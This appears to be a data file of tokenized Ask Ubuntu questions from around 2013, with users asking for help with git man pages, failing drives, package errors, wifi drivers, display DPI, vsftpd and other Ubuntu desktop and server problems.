378343	how to correctly add git man pages to ubuntu	i was starting out with git and decided to have a look at help pages . upon typing : git help config i receive the following error message : man : ca n't resolve /usr/share/man/man1/git-config.1.gz : no such file or directory no manual entry for git-config see 'man 7 undocumented ' for help when manual pages are not available . the package was built from source so i realised that the man pages were separate . i downloaded corresponding man pages in tar.gz format and tried to extract them to : /usr/share/man/ using this command : sudo tar -xzf git-manpages-1.8.4.3.tar.gz -c /usr/share/man unfortunately it changes the ownership from root to user 110493 and group 5000 . the git help command now reads : man : ca n't resolve /usr/share/man/man1/git-config.1.gz : permission denied no manual entry for git-config see 'man 7 undocumented ' for help when manual pages are not available . what can i do to finally make it work ? it should n't take one day to install a set of manual pages .
378348	slow boot & a lot of crash/internal error reports	any idea what might be the problem here ? i have an lenovo u410 with a samsung ssd 840pro , i3 processor running ubuntu 13.10 . very slow boot times and a lot of crash reports and internal error reports . i 've tried a fresh install but still the same . it came with a 24gb msata ( sda ) that seems to have failed but i 'm not using it so do n't know should i remove it or not as its seems to be giving io errors . any tips would be greatly appreciated.. 17:23 aron-lenovo-u410 kernel : [ 64.873067 ] res 40/00:01:00:00:00/00:00:00:00:00/00 emask 0x4 ( timeout ) nov 17 12:17:23 aron-lenovo-u410 kernel : [ 64.873070 ] ata1.00 : status : { drdy } nov 17 12:17:23 aron-lenovo-u410 kernel : [ 64.873080 ] ata1 : hard resetting link nov 17 12:17:28 aron-lenovo-u410 kernel : [ 70.231360 ] ata1 : link is slow to respond , please be patient ( ready=0 ) nov 17 12:17:33 aron-lenovo-u410 kernel : [ 74.877827 ] ata1 : comreset failed ( errno=-16 ) nov 17 12:17:33 aron-lenovo-u410 kernel : [ 74.877838 ] ata1 : hard resetting link nov 17 12:17:38 aron-lenovo-u410 kernel : [ 80.236121 ] ata1 : link is slow to respond , please be patient ( ready=0 ) nov 17 12:17:43 aron-lenovo-u410 kernel : [ 84.882651 ] ata1 : comreset failed ( errno=-16 ) nov 17 12:17:43 aron-lenovo-u410 kernel : [ 84.882661 ] ata1 : hard resetting link nov 17 12:17:48 aron-lenovo-u410 kernel : [ 90.240930 ] ata1 : link is slow to respond , please be patient ( ready=0 ) nov 17 12:18:01 aron-lenovo-u410 networkmanager [ 665 ] : < warn > nl_recvmsgs ( ) error : ( -33 ) dump inconsistency detected , interrupted nov 17 12:18:18 aron-lenovo-u410 kernel : [ 119.911607 ] ata1 : comreset failed ( errno=-16 ) nov 17 12:18:18 aron-lenovo-u410 kernel : [ 119.911618 ] ata1 : limiting sata link speed to 3.0 gbps nov 17 12:18:18 aron-lenovo-u410 kernel : [ 119.911621 ] ata1 : hard resetting link nov 17 12:18:23 aron-lenovo-u410 udisksd [ 1989 ] : error probing device : error sending ata command identify device to /dev/sda : unexpected sense data returned : # 0120000 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ... ... ... ... ... . # 0120010 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ... ... ... ... ... . # 012 ( g-io-error-quark , 0 ) nov 17 12:18:23 aron-lenovo-u410 kernel : [ 124.933964 ] ata1 : comreset failed ( errno=-16 ) nov 17 12:18:23 aron-lenovo-u410 kernel : [ 124.933974 ] ata1 : reset failed , giving up nov 17 12:18:23 aron-lenovo-u410 kernel : [ 124.933978 ] ata1.00 : disabled nov 17 12:18:23 aron-lenovo-u410 kernel : [ 124.933983 ] ata1.00 : device reported invalid chs sector 0 nov 17 12:18:23 aron-lenovo-u410 kernel : [ 124.933998 ] ata1 : eh complete nov 17 12:18:23 aron-lenovo-u410 kernel : [ 124.934035 ] sd 0:0:0:0 : [ sda ] unhandled error code nov 17 12:18:23 aron-lenovo-u410 kernel : [ 124.934038 ] sd 0:0:0:0 : [ sda ] nov 17 12:18:23 aron-lenovo-u410 kernel : [ 124.934040 ] result : hostbyte=did_bad_target driverbyte=driver_ok nov 17 12:18:23 aron-lenovo-u410 kernel : [ 124.934042 ] sd 0:0:0:0 : [ sda ] cdb : nov 17 12:18:23 aron-lenovo-u410 kernel : [ 124.934044 ] read ( 10 ) : 28 00 02 cb b4 d0 00 00 08 00 nov 17 12:18:23 aron-lenovo-u410 kernel : [ 124.934052 ] end_request : i/o error , dev sda , sector 46904528 nov 17 12:18:23 aron-lenovo-u410 kernel : [ 124.934056 ] quiet_error : 162 callbacks suppressed nov 17 12:18:23 aron-lenovo-u410 kernel : [ 124.934058 ] buffer i/o error on device sda , logical block 5863066 nov 17 12:18:23 aron-lenovo-u410 kernel : [ 124.934146 ] sd 0:0:0:0 : [ sda ] unhandled error code nov 17 12:18:23 aron-lenovo-u410 kernel : [ 124.934156 ] sd 0:0:0:0 : [ sda ] nov 17 12:18:23 aron-lenovo-u410 kernel : [ 124.934162 ] result : hostbyte=did_bad_target driverbyte=driver_ok nov 17 12:18:23 aron-lenovo-u410 kernel : [ 124.934171 ] sd 0:0:0:0 : [ sda ] cdb : nov 17 12:18:23 aron-lenovo-u410 kernel : [ 124.934176 ] read ( 10 ) : 28 00 02 cb b4 d0 00 00 08 00 nov 17 12:18:23 aron-lenovo-u410 kernel : [ 124.934194 ] sd 0:0:0:0 : [ sda ] read capacity ( 16 ) failed nov 17 12:18:23 aron-lenovo-u410 kernel : [ 124.934198 ] sd 0:0:0:0 : [ sda ] nov 17 12:18:23 aron-lenovo-u410 kernel : [ 124.934200 ] result : hostbyte=did_bad_target driverbyte=driver_ok nov 17 12:18:23 aron-lenovo-u410 kernel : [ 124.934203 ] sd 0:0:0:0 : [ sda ] sense not available . nov 17 12:18:23 aron-lenovo-u410 kernel : [ 124.934207 ] end_request : i/o error , dev sda , sector 46904528 nov 17 12:18:23 aron-lenovo-u410 kernel : [ 124.934216 ] buffer i/o error on device sda , logical block 5863066 nov 17 12:18:23 aron-lenovo-u410 kernel : [ 124.934319 ] sd 0:0:0:0 : [ sda ] read capacity failed nov 17 12:18:23 aron-lenovo-u410 kernel : [ 124.934327 ] sd 0:0:0:0 : [ sda ] nov 17 12:18:23 aron-lenovo-u410 kernel : [ 124.934331 ] result : hostbyte=did_bad_target driverbyte=driver_ok nov 17 12:18:23 aron-lenovo-u410 kernel : [ 124.934336 ] sd 0:0:0:0 : [ sda ] sense not available . nov 17 12:18:23 aron-lenovo-u410 kernel : [ 124.934378 ] sd 0:0:0:0 : [ sda ] unhandled error code nov 17 12:18:23 aron-lenovo-u410 kernel : [ 124.934384 ] sd 0:0:0:0 : [ sda ] nov 17 12:18:23 aron-lenovo-u410 kernel : [ 124.934388 ] result : hostbyte=did_bad_target driverbyte=driver_ok nov 17 12:18:23 aron-lenovo-u410 kernel : [ 124.934393 ] sd 0:0:0:0 : [ sda ] cdb : nov 17 12:18:23 aron-lenovo-u410 kernel : [ 124.934397 ] read ( 10 ) : 28 00 00 00 08 00 00 00 08 00 nov 17 12:18:23 aron-lenovo-u410 kernel : [ 124.934419 ] end_request : i/o error , dev sda , sector 2048 nov 17 12:18:23 aron-lenovo-u410 kernel : [ 124.934424 ] buffer i/o error on device sda , logical block 256 nov 17 12:18:23 aron-lenovo-u410 kernel : [ 124.934494 ] sd 0:0:0:0 : [ sda ] unhandled error code nov 17 12:18:23 aron-lenovo-u410 kernel : [ 124.934499 ] sd 0:0:0:0 : [ sda ] nov 17 12:18:23 aron-lenovo-u410 kernel : [ 124.934502 ] result : hostbyte=did_bad_target driverbyte=driver_ok nov 17 12:18:23 aron-lenovo-u410 kernel : [ 124.934508 ] sd 0:0:0:0 : [ sda ] cdb : nov 17 12:18:23 aron-lenovo-u410 kernel : [ 124.934511 ] read ( 10 ) : 28 00 00 00 08 00 00 00 08 00 nov 17 12:18:23 aron-lenovo-u410 kernel : [ 124.934526 ] end_request : i/o error , dev sda , sector 2048 nov 17 12:18:23 aron-lenovo-u410 kernel : [ 124.934531 ] sd 0:0:0:0 : [ sda ] asking for cache data failed nov 17 12:18:23 aron-lenovo-u410 kernel : [ 124.934535 ] sd 0:0:0:0 : [ sda ] assuming drive cache : write through nov 17 12:18:23 aron-lenovo-u410 kernel : [ 124.934539 ] buffer i/o error on device sda , logical block 256 nov 17 12:18:23 aron-lenovo-u410 kernel : [ 124.934570 ] sda : detected capacity change from 24015495168 to 0 nov 17 12:18:55 aron-lenovo-u410 whoopsie [ 913 ] : online nov 17 12:18:56 aron-lenovo-u410 whoopsie [ 913 ] : online nov 17 12:19:04 aron-lenovo-u410 networkmanager [ 665 ] : < warn > nl_recvmsgs ( ) error : ( -33 ) dump inconsistency detected , interrupted nov 17 12:19:04 aron-lenovo-u410 whoopsie [ 913 ] : online
378349	`pip : command not found` but it 's installed	sudo easy_install pip searching for pip best match : pip 1.4.1 processing pip-1.4.1-py2.7.egg pip 1.4.1 is already the active version in easy-install.pth installing pip script to /home/nyzlfc/.local/bin installing pip-2.7 script to /home/nyzlfc/.local/bin using /home/nyzlfc/.local/lib/python2.7/site-packages/pip-1.4.1-py2.7.egg processing dependencies for pip finished processing dependencies for pip and then when i run sudo pip install -u pyyaml nltk i get : sudo : pip : command not found
378351	permissions and ownership of /var/www	i am using ubuntu 13.04 vps and have installed lamp ( apache2 ) . now i have uploaded my web files ( wordpress ) in /var/www . but i dont have permissions to write in files . when i run wordpress install , it says that it could not write on wp-config php file . so i execute this command over ssh su cd /var/www sudo chown www-data : www-data -r * /etc/init.d/apache2 restart ( www-data is my apache user ) .still itv cant write into files . i also can not upload files using ftp ( transfer failed error ) . the permissions for directories in /var/www are 755 and for files are 644 . setting permissions 777 resolves the problem but i dont want to chmod it 777 . please help me out.. thx .
378352	ubuntu usb wo n't boot - `` missing operating system ''	i have an asus g75vw with ufei . since i bought it , it has been a pain in the ass to get ubuntu working beside windows . i finally made it but this week i decided it was time for a new install and after several install tries i ended up wiping my whole hdd through gparted on a friends computer . i started from scratch and now i have windows 8 installed properly and ubuntu installed on its own partition , but only windows boots , i was going to try a boot repair , but the pc wo n't boot from the ubuntu usb it throws an error : `` missing operating system '' . if its any good information , i have a 1tb hdd the first partition is windows , the second ubuntu , i do n't know if this has something to do with the partition table being gpt , i was thinking wiping the hdd again with a live cd and making a new partition table and then a installing windows and ubuntu . any help will be appreciated . edit the usb live disk was corrupt , i did it several times and turn out the usb was corrupt or something . i had to do boot-repair and on the second time , the problem was fixed .
378358	is there a way to search for keyboard layouts by characters on specific buttons ?	i have a dell inspiron 7520 se , bought it here in egypt . i need to install the english and arabic language layouts but i 've spent too much time trying numerous different layouts and nothings worked perfectly , i get 2-3 misplaced characters at best . is there an way by which i can filter out layouts by specific characters for specific buttons ? for example , can i specify a button location and search for layouts that output a specific character which this button is clicked ? of course i need to do this for multiple buttons to be able to zero in the best layout for me . i read the layout editing\customization guide but it sounded very complicated and i ca n't risk messing anything with my current setup .
378362	preview thumbnail for .agr ( grace ) files 12.04	in ubuntu 12.04 nautilus is not showing preview thumbnails for .agr files produced by grace unlike ubuntu 10.04 . how can i have preview thumbnails for .agr files on ubuntu 12.04. sample file . https : //www.dropbox.com/s/tfb0z8xfg7p4nvq/sample.agr
378364	disable right click menu	i want to customize a lubuntu-13.04-desktop-amd64.iso . so i make changes in filesystem.squashfs and build the iso . i would like to disable the right click menu on the desktop and right click menu on the lxde panel . how can i do that ? in the filesystem.squashfs , i have tried removing the 'showmenu ' tags in /etc/xdg/openbox/rc.xml . but it does n't hide the right click menus . they still appear . where i need to modify ?
378367	i ca n't upgrade for installation : e : sub-process /usr/bin/dpkg returned an error code ( 1 )	i try to install flight gear , and i ca n't upgrade . i try sudo apt-get upgrade after run uptade , but not works ! andrei @ andrei-h61m-ds2 : ~ $ sudo apt-get upgrade [ sudo ] password for andrei : reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : playonlinux 0 upgraded , 0 newly installed , 0 to remove and 1 not upgraded . 1 not fully installed or removed . need to get 0 b/46,3 mb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : error processing google-chrome-stable ( -- configure ) : package google-chrome-stable is not ready for configuration can not configure ( current status `half-installed ' ) no apport report written because maxreports is reached already errors were encountered while processing : google-chrome-stable e : sub-process /usr/bin/dpkg returned an error code ( 1 ) then : andrei @ andrei-h61m-ds2 : ~ $ installarchives ( ) failed : selecting previously unselected package flightgear-data-base . ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 213879 files and directories currently installed . ) unpacking flightgear-data-base ( from ... /flightgear-data-base_2.10.0-2_all.deb ) ... dpkg : error processing google-chrome-stable ( -- configure ) : package google-chrome-stable is not ready for configuration can not configure ( current status `half-installed ' ) setting up flightgear-data-base ( 2.10.0-2 ) ... errors were encountered while processing : google-chrome-stable error in function : what should i do ?
378368	installing ubuntu touch application on desktop	if i make an application with the ubuntu sdk how can i install it on my laptop . so that it can be launched from the dash , and without needing to have the ubuntu sdk .
378369	booting from a windows xp cd when ubuntu is installed	i had windows xp installed on my computer . then i installed ubuntu , and i was able to boot either to windows or to ubuntu using grub . but one day when my computer was running windows xp , there was sudden power failure and the computer was stopped without a proper shutdown . the next time i started the computer windows could not be started properly , and it was making the computer restart in a loop . now i need to repair the corrupt windows os , but when i try to boot the computer by a windows xp cd in the cd drive this processing with these messages is shown on the screen : starting caldera dos ... [ then after some processing this message comes : ] using dpms dos protected mode services ... cache size : 7670 kb ( xms ) min cache size : 1024 kb write through drives a b current options : /mlx /bl=16 /lend=on /delay=off caldera dr-dos 7.03 [ then this dr-dos prompt is shown on the screen : ] [ dr-dos ] a : > after then nothing happens . i would request if somebody could help with this problem .
378374	problems while formating to fat32	i need to format my external hard drive to fat32 in order for it to work on a ps3 , but when i try to do it in gparted i get an error : if this helps , first i formated it to fat32 without any problems but when i started transferring files i got an input/output error and every file turned into read only , so i remounted the drive and started transferring again and the same thing happened .
378377	ca n't install gloobus-preview ubuntu 13.10	i was trying to install gloobus-preview following this site : http : //ubuntuhandbook.org/index.php/2013/08/install-gloobus-preview-in-ubuntu-13-04/ the problem is that when i try to install the packages - gloobus-preview and gloobus-sushi - the terminal writes that the packages where not found , although it found the repository . i 'm running ubuntu 13.10 . what do i have to do ?
378379	how to warn before rebooting , or avoid , a reboot upon pressing alt ctrl del	this is a silly one , but i have an instinct to use the triple combination to wake up my desktop , probably a remnant of the windows years . it happens only once in a very long while , but i 'd like to avoid this happening altogether . is there a way or configuration to get a warning screen rather than having the os reboot right away when this combination is pressed , or a way to disable this combination altogether from initiating a restart ?
378380	how to remove ffmpeg completely in ubuntu 13.10 ?	i tried this guide to install ffmpeg , but now i want to remove it completely from ubuntu 13.10 , but when i did that guide to remove , ffmpeg is still there ! how to remove it exactly ? after removing ffmpeg i see this output again : deniz @ deniz-ubuntu : ~/downloads $ ffmpeg ffmpeg version git-2013-11-15-995f450 copyright ( c ) 2000-2013 the ffmpeg developers built on nov 15 2013 18:32:56 with gcc 4.8 ( ubuntu/linaro 4.8.1-10ubuntu8 ) configuration : -- disable-yasm libavutil 52 . 53.100 / 52 . 53.100 libavcodec 55 . 43.100 / 55 . 43.100 libavformat 55 . 21.100 / 55 . 21.100 libavdevice 55 . 5.100 / 55 . 5.100 libavfilter 3 . 91.100 / 3 . 91.100 libswscale 2 . 5.101 / 2 . 5.101 libswresample 0 . 17.104 / 0 . 17.104 hyper fast audio and video encoder usage : ffmpeg [ options ] [ [ infile options ] -i infile ] ... { [ outfile options ] outfile } ... use -h to get full help or , even better , run 'man ffmpeg'
378385	wireless card driver installation	i have problem installing drivers for asus wl-138g v2 card . first , after installing ubuntu 12.04 , i did everything that i could find with jockey-text or its gui version . in the gui version i got some error , generally discussed here : broadcom sta wireless driver however , after executing apt-get install command which was a part of the answer there and installing also b43-fwcutter thingy i rebooted the pc and i had no longer the proprietary driver listed in the list though the wireless connection is still not available . then i wanted to install drivers from asus.com . there was that readme file in which there was an instruction : extract the tar package . tar -xzvf src-.tar.gz build the driver cd src/linuxsta/src/wl/linux in the makefile make sure to set the variables cross_compile= , if the the gcc is not already in the $ path or if a different compiler needs to be used , and gcc-rev= dictates the path of the prebuild regulatory binaries , to use while building the driver . ( values it takes now are 3.4.2 or 4.0.2 ) , if the kernel version is 2.6.14.3 the driver expects that iee80211_crypto.ko module be loaded , prior to loading this driver . make clean make test the driver by loading it insmod wl.ko so i changed the makefile so that : gcc-rev : =4.6.2 //is that correct ? export cross_compile : =/usr/bin/ and modified linuxdir to /usr/src/linux-headers-3.8.0-29-generic as it seemed to not find the linux directory by its own . i got something like this : root @ bartek : home/bart/downloads/src/linuxsta/src/wl/linux # make linux directory is /usr/src/linux-headers-3.8.0-29-generic linux kernel versions is 3.8.0-29-generic make -c /usr/src/linux-headers-3.8.0-29-generic cross_compile=/usr/bin/ m=/home/bart/downloads/src/linuxsta/src/wl/linux modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.8.0-29-generic' cc [ m ] /home/bart/downloads/src/linuxsta/src/wl/linux/wlc_led.o in file included from /home/bart/downloads/src/linuxsta/src/wl/linux/wlc_led.c:17:0 : /home/bart/downloads/src/linuxsta/src/wl/linux/../../include/typedefs.h:166:40 : error : conflicting types for ‘bool’ include/linux/types.h:29:17 : note : previous declaration of ‘bool’ was here in file included from /home/bart/downloads/src/linuxsta/src/wl/linux/../../include/linux_osl.h:21:0 , from /home/bart/downloads/src/linuxsta/src/wl/linux/../../include/osl.h:24 , from /home/bart/downloads/src/linuxsta/src/wl/linux/wlc_led.c:19 : /home/bart/downloads/src/linuxsta/src/wl/linux/../../include/linuxver.h:19:26 : fatal error : linux/config.h : no such file or directory compilation terminated . make [ 2 ] : *** [ /home/bart/downloads/src/linuxsta/src/wl/linux/wlc_led.o ] error 1 make [ 1 ] : *** [ _module_/home/bart/downloads/src/linuxsta/src/wl/linux ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.8.0-29-generic' make : *** [ default ] error 2 i 'm not sure what does it mean ( problem with gcc ? with drivers ? ) . the pc is pretty old , year 2004 , runs on amd sempron 3100+ with 2gb of ram .
378386	how to get the right dpi resolution on ubuntu 13.04 saucy ?	the physical dpi of my laptop screen is approximately 142 dots per inch as you can calculate from the correct output of xrandr -- query : $ xrandr -- query | head screen 0 : minimum 320 x 200 , current 1920 x 1080 , maximum 32767 x 32767 edp1 connected primary 1920x1080+0+0 ( normal left inverted right x axis y axis ) 344mm x 193mm however , ubuntu appearantly forces the x server to use 96 dpi and thus assume a wrong physical size of the display , which you can check with xdpyinfo $ xdpyinfo | grep -b2 dots screen # 0 : dimensions : 1920x1080 pixels ( 508x286 millimeters ) resolution : 96x96 dots per inch as a consequence , fonts and other visual elements are smaller as they should be . you can check with any web browser on this website . the square is too small , less than 1 in^2 . this answer lists a number of work-arounds , none of which works for me : tell lightdm to start x with the option -dpi 142 , which i achieved on saucy by editing /etc/lightdm/lightdm.conf.d/50-xserver-command.conf . has no effect . run xrandr -dpi 142x142 , when starting the x session by adding a file to /etc/x11/xsession.d/ . has no effect set the text-scaling-factor , which can be achieved in a number of ways . this only effects fonts rendered by unity/gnome/gtk ( ? ) , basically the standard ubuntu gui , but fails for other apps such as web browsers or pdf viewers . not what i want . how do i get ubuntu to use the correct dpi for my screen ? update : this appears to be a known bug disguised as a feature . what are your workarounds ?
378389	how to unlock a usb broadband modem	i have a huawei e303 modem given by a mobile broadband service provider . i did pay for it . i had terminated the service from that service provider . but i can not use that modem which i did paid to gain , because it has been locked ! is there a application in ubuntu for get unlock it ? is this having a legal issue ? ( if so i will remove this question ) i followed certain guides in certain sites but could not fix this . here is the lsusb output . last one is the particular modem : lsusb bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 004 : id 10f1:1a34 importek bus 002 device 012 : id 12d1:1001 huawei technologies co. , ltd. e169/e620/e800 hsdpa modem bus 002 device 013 : id 12d1:14fe huawei technologies co. , ltd .
378390	oops : 500 : child died	i am using ubuntu 13.04 on my vps . i have installed vsftpd from this command : sudo apt-get install vsftpd with following configurations- anonymous_enable=no local_enable=yes write_enable=yes chroot_local_user=yes use_localtime=yes and other default configurations . when i connect to ftp using any client it gives error oops:500 : child died p.s : i mistakely deleted a file called ftpusers in /etc and i dont know if its causing the problem . purged and reinstall vsftpd , same error . i also tried restarting apache and vsftpd . the contents of ftpusers file are- # /etc/ftpusers : list of users disallowed ftp access . see ftpusers ( 5 ) . root daemon bin sys sync games man lp mail news uucp nobody permissions and owner of ftpuser are -rw-r -- r -- 1 root root 132 may 16 2013 /etc/ftpusers i am connecting to ftp from user : ash
378391	screen goes black when trying to switch users on ubuntu 13.10	i just installed ubuntu 13.10 on my dell xps l502x laptop last night . i set it up as a dual boot with windows 8.1 . i was testing the gui to make sure all features work . examples : software updater for the latest updates , tweaking the system settings to my personal taste , setting up wireless network , etc . the only things i tweaked were uninstalling thunderbird and removing the mail icon on the system bar , and changed the wireless icon on my laptop from blinking light - > solid light . i click on the power icon in the upper right corner of the system bar . i scroll down to guest session to switch user . when i click switch user , my monitor goes black . nothing happens . pressing `` enter '' or any keys on the keyboard does not change or manipulate the screen . the only thing i can do is use the command : alt+prntscr reisub it reboots the laptop has this happened to anyone ?
378393	asking for : brief tutorial for remote torrent client - transmission model	i have a remote server , ubuntu 12.04 server edition , which i access through ssh . i just want to be able to download torrents there , both to be able to seed without slowing my home connection , and download with greater speed and without bothering too much about leaving the system open to have a continuous download . so , after doing a little search about the matter , i installed transmission and transmission-daemon on the remote machine . however , perhaps because the tutorials assumed ( ? ) some specific knowledge about these functions in remote mode , i still have not found a definitive guide for the simplest thing i want to get done with the above - get a torrent link/file , insert it , and start downloading , nor have i managed to find out on my own - i constantly mess up with various settings , but still have n't managed to get the work done . therefore , excuse me for the ignorance , but i am asking for a simple and straightforward series of steps on how to get the desirable torrent file/link and download the respective torrent on the remote machine , through ssh . just that . thank you in advance .
378396	confusion regarding sub-directories ?	i have a question to count and display number of sub-directories including hidden ones ( invisible sub-directories ) recursively . i can display sub-directories recursively but i am confused with the invisible sub-directories . in addition i can only use ls and wc command for the solution . please do n't suggest 'find ' command i have to use only ls and wc command . so far i have tried the following commands . ls -1 | wc -l ls -r | wc -l ls -r | wc -c ls -ar | wc -l ls -ar | wc -c but still i have not found the solution . can you please enlighten me .
378397	how to install libqtwebkit5 ?	how can i install libqtwebkit5 library ? i need it for a qt project . i tried with : $ sudo apt-get install libqtwebkit5 reading package lists ... done building dependency tree reading state information ... done e : unable to locate package libqtwebkit5 i have this problem on both : 12.04 and 13.10
378398	can not connect to wifi that needs a username and password ?	i was attending an programming event at a college . there was not public wifi , however the event hosts would give us temporary username and passwords to connect . i was unable to connect using kubuntu 13.10 . kubuntu 's network manager just asked for a password . after finding this out i went to edit connections and tried : leap < p > g_hack1 = username < p > hx3vlysi = password i still could not connect . and then i tried : wpa and wpa2 enterprise and entered the same username into identity and password into private key password . i still could not connect . if it matters , the event holders had a list of username and passwords that would only work for 3 devices for each username and password . in windows , the wifi manager asked for the username and password automatically . how could i fix this ?
378399	problem with apt-get upgrade	i try sudo apt-get upgrade after running update , but not working ! here is the error details sudo apt-get upgrade [ sudo ] password for andrei : reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : playonlinux 0 upgraded , 0 newly installed , 0 to remove and 1 not upgraded . 1 not fully installed or removed . need to get 0 b/46,3 mb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : error processing google-chrome-stable ( -- configure ) : package google-chrome-stable is not ready for configuration can not configure ( current status `half-installed ' ) no apport report written because maxreports is reached already errors were encountered while processing : google-chrome-stable e : sub-process /usr/bin/dpkg returned an error code ( 1 )
378403	touchpad pointer lags / hangs / jumps	i have hp mini 210 and i tried to install ubuntu , xubuntu and even lubuntu . but the problem is the same : when moving the cursor i see lags between cursor 's previous position and current and sometimes the touchpad becomes barely responsive . i tried to configure xorg files , but it did n't help so i reverted all to normal . is there some workaround for that ?
378405	`` he 's dead , jim ! '' each 5 minutes in chromium	please tell what happened , this did n't happened when i had debian actually , i have 512mb ram so i changed my swappiness to 90 % is this because of that ? edit : changed back to 60 % but nothing happened , same problem
378409	ubuntu 13.10 takes about 5min to boot	since i upgraded from 13.04 to 13.10 , it takes about 5 minutes to boot , if i press alt+strg+f1 i get a black screen and after about 5min the first line appears ( [ 308.657400 ] see below ) . i have a lenovo thinkpad t420s and no major problems with ubuntu so far . if i boot from an older kernel everything works fine . the log says : [ 2.307331 ] usb 2-1.5 : product : integrated smart card reader [ 2.307337 ] usb 2-1.5 : manufacturer : lenovo [ 2.357195 ] ata5 : sata link down ( sstatus 0 scontrol 300 ) [ 2.709219 ] switched to clocksource tsc [ 2.825467 ] [ drm ] enabling rc6 states : rc6 on , rc6p off , rc6pp off [ 308.657400 ] kjournald starting . commit interval 5 seconds [ 308.657436 ] ext3-fs ( sda5 ) : mounted filesystem with ordered data mode i 've tried to disable rc6 as this seemed the point where everything stopped , but same result . is anyone experiencing similar problems ? any idea how to fix this ?
378411	can not get xbox controller working	i run kubuntu 12.04.3 64bit lts on a dell inspiron 1420 laptop . i have installed the xboxdrv respo and followed everything i can find . but unlike all other problems related to this kubuntu deos not detect the controller . i have a 3rd party powera micro wired xbox 360 controller and a 3rd party mad catz wired controller . neither work neither are detected by lsusb xboxdrv or the joystick section in kde 's system settings . nor is it detected by jstest-gtk . all that happens is the leds blink but otherwise not detected . i have followed steps provided all over askubuntu and other sites as well nothing works . i have restarted dozens of times still nothing .
378412	wich environment is faster than unity ?	i 'm having a little trouble using my 305u samsung laptop with ubuntu 13.10 , it gets really slow . is there some environment like gnome3 or other that can make it work faster than in unity ?
378416	wireless does n't connect on ubuntu 12.04 an keeps asking for password	i 'm a new ubuntu user , just installed ubuntu 12.04.3 and it could n't connect to neither wired nor wireless . when trying to connect to wireless , it detects my network but keeps asking for authentication over and over and never connects . i 've checked so many posts regarding this problem , and tried every proposed solution , but nothing works . i 'd be grateful for any help .
378418	playonlinux can not find wine ( from wine )	when i run playonlinux gives me this message : playonlinux can not find wine ( from wine ) you should install it to use playonlinux what should i do .
378419	4 screens icon can become 4 seperate icos	is there a way to have 4 separate icons on the left menu bar , one for each screen window , instead of one . if there are 4 icons then by clicking on one of those icons the co responding window will pop up . thank you
378423	problem in downloading new profile in kdenlive	i have problem in downloading new profiles in kdenlive . in all cases ( wipes , render profile , project profile , title ) , nothing is being downloaded and i only see 'loading data ' as you see in the screenshot . what is the problem and what is the solution for it ? thanks
378425	restore accidentally with rm'ed pam.conf ?	i have accidently removed the files /etc/pam.conf and /etc/security/pam_env.confusing rm . now i get this error message when i try to use sudo : sudo : unable to initialize pam : no such file or directory how can i fix that ?
378427	how to install libxul-embedding ?	so , like i said in the title , i need to use mozembed , the newapi to integrate gtk and gecko . but , when i 'm trying ./configure it search for libxul-embedding , and i have no idea when i can find this lib . anyone knows , what can i do ?
378436	vm don´t uses graphicscard	i wand to play a linux game ( 64bit version of kerbal space program ) , but i don´t wand to install it because i don´t wand to format my harddrive . i use vmwareplayer and ubuntu , but it seams that it´s not using my real ( phisical ) grafik-cart , wath can i do ? is there an vm that can use the hardware or is there a easy way to intall linux ?
378437	only guest session can be started	while ubuntu is starting , the following messages are shown and stays shown for long time : * starting lightdm display manager [ ok ] * stopping send an event to indicate plymouth is up [ ok ] * starting startpar bridge for notification of upstart job start/stop [ ok ] * stopping startpar bridge for notification of upstart job start/stop [ ok ] after reaching the login page and attempting to login , the same messages are shown again , then i 'm returned to the login page to choose between my my username and a guest session . if i choose a guest session , everything goes ok and i login as a guest . i tried restarting the machine , and then new , but similar messages appeared : * starting lightdm display manager [ ok ] * stopping send an event to indicate plymouth is up [ ok ] * starting startpar bridge for notification of upstart job start/stop [ ok ] * stopping startpar bridge for notification of upstart job start/stop [ ok ] * starting mount network filesystems [ ok ] * stopping mount network filesystems [ ok ] * stopping send an event to indicate plymouth is up [ ok ] * starting startpar bridge for notification of upstart job start/stop [ ok ] and the same scenario is repeated . i can login only using a guest session . if i use my user , i 'm shown these messages , but this time , it took a very long time and i was n't shown the login page again , so i had to restart my machine . the thing i can remember that could be causing a problem , is that i added a path to the path environment variable in the ~/.pam_environment file . but i remember it was written ok : path=/my/path : $ { path } and while ubuntu was starting , i connected my external screen . could any of this be a cause to this problem ? what is the problem in the first place ? ! i 'm using dell inspiron 7520 se .
378439	unity launcher position / autohide problem	unity launcher ( docked on the left edge ) on the left side has 1px gap . when i move my mouse to the left side of the screen it shows my launcher but as an result of this extra 1px space it will automatically hide again so i have to move my mouse few px back to the screen . if i move it too much the launcher will of course hide and it got bugged - do n't want to show itself and just ignore mouse position . i have to press super key or hit alt+f1 to give it focus which restores default behaviour . i am using auto hide feature but the gap is present even if i use no-hide settings . how can i move my launcher 1px to the left so i get rid of this gap ? my goal is so that my launcher wo n't hide if i move my mouse to the left .
378440	how to avoid shutdown on critical battery ?	there exists a well-known bug in gnome-power-manager , which breaks ubuntu on computers with 2 or more batteries . if one is empty , ubuntu will shutdown ( 'critical battery ' ) . as a workaround , it can useful to disable shutdown on critical battery status . however with ubuntu 13.10 saucy , the gui does n't allow this . what can i do ?
378445	ubuntus desktop	okay so is there a way that i can use the desktop part of ubuntu like windows ? in the sense that applications and programs are clickable on the desktop ? i ca n't seem to figure anything out and cinnamon is n't working for me on 13.10
